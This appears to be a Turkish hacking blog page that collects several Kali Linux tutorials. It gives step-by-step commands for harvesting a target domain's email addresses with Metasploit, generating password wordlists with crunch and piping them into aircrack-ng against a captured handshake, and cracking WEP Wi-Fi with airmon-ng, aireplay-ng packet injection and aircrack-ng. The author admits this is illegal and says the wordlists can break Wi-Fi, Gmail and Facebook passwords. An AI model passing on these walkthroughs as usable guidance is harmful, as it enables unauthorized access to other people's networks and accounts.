Kali Linux Burpsuite Shell Upload Bypass

Selamun Aleyküm ..

Kali Linux 2017.1 Burpsuite (Professional) Shell Upload Bypass





Fan Sesi İçin Kusura Bakmayın :)

Hedef Siteye Ait Mail Adresini Bulmak


Merhaba Arkadaşlar.. Firsat Buldukça Bildiklerimi Sizinle Paylaşmaya Devam Ediyorum Bi Önceki Konum Olan Wifi Hack Baya İlgi Gördü Ve Bu Konu Hakkinda Olumlu Yorumlar Aldim  Her Ne Kadar İllegal Olsada :) . Bügün Hedef Sitemize Ait Mail Adresini Bulmayi Göstericem Oldukça Basit.

1. Terminalde " Msfconsole " Yaziyoruz.



2. Komut : " use auxiliary/gather/search_email_collector " 




3. Komut : " set domain hedefsite.com "  Ve İşlemimizin Başlamasi İçin "exploit " Yazip Enter'liyoruz.


4. Exploit Yazdik Ve Tarama İşlemimiz Başladi .


5. Sonuç : 

Kali Linux Terminal'e Nick Yazmak

1.Komut: " apt-get install figlet "  

2.Komut : " leafpad /root/.bashrc "

 

3. Açilan Bashrc Dosyasinin En Alt Satirina Gelerek " figlet Nick " Yazip Kayit Edip Çıkmak. Yeni Terminalde Yazilan Nick Gözükecektir.  

4. Gördüğünüz Gibi Şekil Olmuş Dimi (:   



Wordlist Hazirlama / Kali Linux

Bügün Sizlere Kali Linux Üzerinde Wordlist Hazirlamayi Göstericem Neden Derseniz Wordlist Bulmak Her Zaman Sıkıntı Crunch Sayesinde En Güncel Wordlistinizi Oluşturabilirsiniz. Windows İçinde Wordlist Hazirlama Programlari Mevcut Ancak Güncel Değil Yada Bizim İstediğimiz Gibi Bi Wordlist Hazirlayamamaktadir(Benim Görüşüm) O Yüzden Crunch Bizim İçin Önemlidir Kombinasyon Üzerine Yapildiği İçin Her Türlü Olasılığı Üretmektedir. 1. Terminal açip "crunch" Komutunu Yaziyoruz.  
2. Ben En az 4 Ve En Fazla 6 Karakteri Geçmeyecek Şifreler İstiyorum "rezart64" Bu Harf Ve Sayilardan Bana Olabilecek Her Türlü Olasılığı Oluşturacak. Ama Başta Girdiğimiz 4 ve 6 Haneden Oluşturacak Bu Size Kalmiş Bu Değerleri Değiştirebilirsiniz Atiyorum En Az 8 En Fazla 12 Harfli ve Rakamli Wordlist Oluşturmak İstiyorsunuz Bunun İçin Yapmanız Gereken " crunch 8 12 trazer123456 -o /root/Desktop/şifre.txt " Şeklinde Olucaktir. Buradaki " -o /root/Desktop/şifre.txt" İşlemi İse Oluşacak Txt Dosyasinin Nereye Hangi İsimde Kaydedileceğini Soruyor. Masa Üstüne Şifre.txt Adiyla Kaydedilmesini İstedik.  

Burada Bize "rezart64" Değerinden 136857 Adet Şifre Oluşturduğunu Söyledi (:, 3. Oluşan Şifreler.txt Belgemize Bakalim Gördüğünüz Gibi Masa Üstünde. İçindeki Oluşan Şifrelere Göz Atalim Gördüğünüz Gibi Trazer'i de Üretmiş Bulunmakta .

 

4. Diyebilirsinizki : İyi Güzel Anlatmişsinda Nerden Kullanicaz Bu Oluşan Wordlisti Yada Ne İşimize Yaricak ? (: Wordlist Bize Her Zaman Lazım Brute Force Yaparken Bu Wordlist Sayesinde Wireless, Hotmail, Gmail, Facebook, Twitter Kullanicilarin Şifrelerini Oluşturduğumuz Wordlist Sayesinde Kirabiliriz. (:

Sızma Testlerinde Özelleştirilmiş Crunch Wordlist Dosyası  Charset.lst Dosyasının Icınde Bulunmaktadır.




                                


  • CHARSET.LST Dosyasımızın İçi Bu Şekildedir


# charset configuration file for winrtgen v1.2 by Massimiliano Montoro (mao@oxid.it)
# compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuanglei@hotmail.com>


hex-lower                     = [0123456789abcdef]
hex-upper                     = [0123456789ABCDEF]

numeric                       = [0123456789]
numeric-space                 = [0123456789 ]

symbols14                     = [!@#$%^&*()-_+=]
symbols14-space               = [!@#$%^&*()-_+= ]

symbols-all                   = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
symbols-all-space             = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

ualpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric                = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]

ualpha-numeric-all  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space      = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

lalpha                        = [abcdefghijklmnopqrstuvwxyz]
lalpha-space                  = [abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric                = [abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space          = [abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14       = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=]
lalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ]
lalpha-numeric-all      = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
lalpha-numeric-all-space      = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

mixalpha                   = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space             = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ]
mixalpha-numeric           = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
mixalpha-numeric-space     = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
mixalpha-numeric-symbol14  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all       = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

#########################################################################################
#                 SWEDISH CHAR-SUPPORT                                                  # #########################################################################################

#########################
# Uppercase             #
#########################
ualpha-sv                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ]
ualpha-space-sv                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ]
ualpha-numeric-sv                = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789]
ualpha-numeric-space-sv          = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ]
ualpha-numeric-symbol14-sv       = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space-sv = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ]
ualpha-numeric-all-sv            = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
ualpha-numeric-all-space-sv      = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

#########################
# Lowercase             #
#########################
lalpha-sv                        = [abcdefghijklmnopqrstuvwxyzåäö]
lalpha-space-sv                  = [abcdefghijklmnopqrstuvwxyzåäö ]
lalpha-numeric-sv                = [abcdefghijklmnopqrstuvwxyzåäö0123456789]
lalpha-numeric-space-sv          = [abcdefghijklmnopqrstuvwxyzåäö0123456789 ]
lalpha-numeric-symbol14-sv       = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=]
lalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+= ]
lalpha-numeric-all-sv            = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
lalpha-numeric-all-space-sv      = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]

#########################
# Mixcase               #
#########################
mixalpha-sv                   = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ]
mixalpha-space-sv             = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ]
mixalpha-numeric-sv           = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789]
mixalpha-numeric-space-sv     = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ]
mixalpha-numeric-symbol14-sv  = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all-sv       = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]
mixalpha-numeric-all-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]


Örnek Olarak Gösteriyim. Bitane  Handshake Yakaladıgım Bir Cap Dosyası, War Bu Cap Dosyasını Wordlist Olusturmadan, Yanı Wordlisti Bılgısayara Kayıt Etmeden Olusan Wordlistleri Aircrak İle Denemesini Sağlayağım,






Örnek Komut : root@trazer:/usr/share/crunch# crunch 8 10 -f charset.lst ualpha  | aircrack-ng -b 18:28:61:3F:69:0F /root/Desktop/super.cap -w-

 Yukarıdakı Resımde Gösterdigim Gibi Crunch Klasorunun İçinde Vermelisiniz Komutu Yoksa Calısmaz Alltaki Resimde Dogru Ancak Eksık Komut Girilmiş Üsteki Resimdeki Gibi /usr/share/crunch# Klasorunde Calıstırmalıısınız Komutu.

Resimde Yanlıs Yerde Yanlıs Komut Kullanmısım Charset Kullanabılmemız İçin O Dizinde Yazmalıyız Komutumuzu, Aldırmayın Dogrusu Üsteki Resimdeki Gibidir.. 




Diyecek Olursak CRUNCH ile en az 8 en fazla 10 harften oluşacak sekılde sıfre olusturmasını ıstedık. bu sıfreler neden olusacak dedi ve bizde ualpha    = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] 'dan Olusacağını Belirttik Ardından aircrak'a bssid'imizi verdik sonra yakaladıgımız handshake (cap) dosyasının yolunu gösterdik ve ualphadan olusacak sıfrelerı aynı pencerede aircrack ıle cap dosyasının uzerinde denemeye basladı. Buldugunda Şifreyi Bize Key Found Olarak Göstericek. Umarım Anlatabilmişimdir.




Wireless Şifre Kirmak Wifi Hack Resimli Anlatim

Meraba Arkadaşlar Bugün Size WEB Wifi Hack'i Kendimce Anlatmaya Çalıştim Biraz Aceleye Geldi İdare Edin (: Faydali Olmasi Dileğiyle ... Bu KONUMUZDA Sizlere Wmware Work Station 10 Üzerinde Kali Linux Kurulumundan Bahsetmiştim. Şimdi İse Kali Linuxta Şifreleme Türü WEB Olan Ağların Nasıl Şifrelerinin Elde Edilebileceğini Anlatıcam. Tabikide Bilgi Amaçlıdır. 


Videolu Anlatım : 



Resimli Anlatım:  
  1.komut :" iwconfig"


2.komut:"ifconfig"wlan0 HWaddr:00:25:22:4c:50:17 yazan bölüm bizim MAC adresimiz.

 

3.Komut:"airmon-ng start wlan0" Bu Komut İle Ağ Kartimizi Aktif Hale Getiriyoruz. (Monitor Mode Enabled on mon0)

 

4.Komut :"airodump-ng mon0"Komutu İLe Çevremizdeki Wifi Ağlarin Essid (İSMİ) BSSİD (Mac Adresi) CH (Yayin Yaptiği Kanal Numarasi)ni görebiliriz. Buradan Kendimize Şifreleme Türü WEB Olan Bi Hedef Seçiyoruz Hedefimizin Mac (BSSİD) CH(Kanal NO) Aliyoruz notepad dosyasına kaydediyoruz. (Ben Guvenlik İçin Bssid Ve Essid'i Gizledim.)

 

5.Komut:"airodump-ng -c 6 --bssid 00:00:XX:XX:XX:XX hedef mac --ivs -w deneme mon0"yada hedef modem ismini yaz mon0 enter.Burdaki -c Hedefin yayin yaptiği kanal numarasi. örn: "airodump-ng -c 6 --bssid 11:22:33:23:83:44 --ivs -w wifihack mon0" burdaki "wifihack" yazisi toplayacak olan paket dosyamizin adi "wifihack" bu dosyada başlangıç klasorüne kayit edilecek otomatik olarak.

 

6.Komut:Trafik Oluşturma. "aireplay-ng -1 2 -o 10 -q 10 -a hedef mac adresini yaz buraya -h kendi mac adresini buraya yaz mon0" Örn:aireplay-ng -1 2 -o 10 -q 10 -a 00:00:XX:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

7.Komut:Yeni Bir Konsol Açıp Şu Komutlari Yaziyoruz:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b hedef mac adresi -h bizim mac adresi mon0" Örn:"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:XX:XX:XX -h 00:25:22:4c:50:17 mon0"

 

8.Komut:Bu Kisimda Yapmamiz Gereken Paket Toplamasini Beklemek Yeteri Kadar Paket Topladiğinda Şifre Kirma İşlemimiz Kisa Sürede Sonuç Verecektir.

 

9.Komut: En Sevdiğim Kısım (: Yeni Bi Terminal Açıyoruz Ve "aircrack-ng -a 1 wifihack-01.ivs" Yaziyoruz Ve Topladiğimiz Paketleri Kirmaya Başlıyoruz. Hatirlarsaniz 5. Komutta Dosya İsmimizi "wifihack" Olarak Belirtmiştik Bu Yüzden 5.Komutta Vericeğiniz İsmi Unutmayiniz Unutursanizda Zaten Başlangıç Klasoründe Olucaktir (:

 

10.Komut: aircrack-ng -a 1 wifihack-01.ivs

 

Ve İşte Kirilan Şifremiz KEY FOUND! [* *: * *: * *: 9 9:9 9:] Aralarindaki : İşaretlerini Silin Ve Bağlanin.. Yakinda Hanshake Yakalayarak WPA WPA2 Hack'i Anlaticağim Takipte Kalin. Yapamayan Hata Alan Yorum Yapsın Yardimci Olalim.
ip adresi